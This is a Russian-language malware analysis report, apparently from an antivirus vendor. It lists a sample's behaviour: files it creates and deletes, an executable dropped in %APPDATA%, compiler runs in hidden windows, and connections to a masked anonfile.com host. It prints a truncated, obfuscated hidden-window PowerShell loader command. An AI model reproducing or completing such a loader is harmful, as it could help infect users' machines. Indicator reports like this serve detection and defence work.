Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function lc596 {param($l5dbfeb)$ue58c18='u66f841';$n6eb98d='';for ($i=0; $i -lt $l5dbfeb.length;$i+=2){$fe21f91=[convert]::ToByte($l5dbfeb.Substring($i,2),16);$n6eb98d+=[c...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\wctr-2po.0.cs
- %TEMP%\wctr-2po.cmdline
- %TEMP%\wctr-2po.out
- %TEMP%\csc421d.tmp
- %TEMP%\res421e.tmp
- %TEMP%\wctr-2po.dll
- %APPDATA%\n2914c8.exe
Удаляет следующие файлы
- %TEMP%\res421e.tmp
- %TEMP%\csc421d.tmp
- %TEMP%\wctr-2po.0.cs
- %TEMP%\wctr-2po.out
- %TEMP%\wctr-2po.pdb
- %TEMP%\wctr-2po.dll
- %TEMP%\wctr-2po.cmdline
Сетевая активность
TCP
- 'cd####.anonfile.com':443
- 'an###ile.com':443
UDP
- DNS ASK cd####.anonfile.com
- DNS ASK an###ile.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\wctr-2po.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES421E.tmp" "%TEMP%\CSC421D.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\wctr-2po.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES421E.tmp" "%TEMP%\CSC421D.tmp"
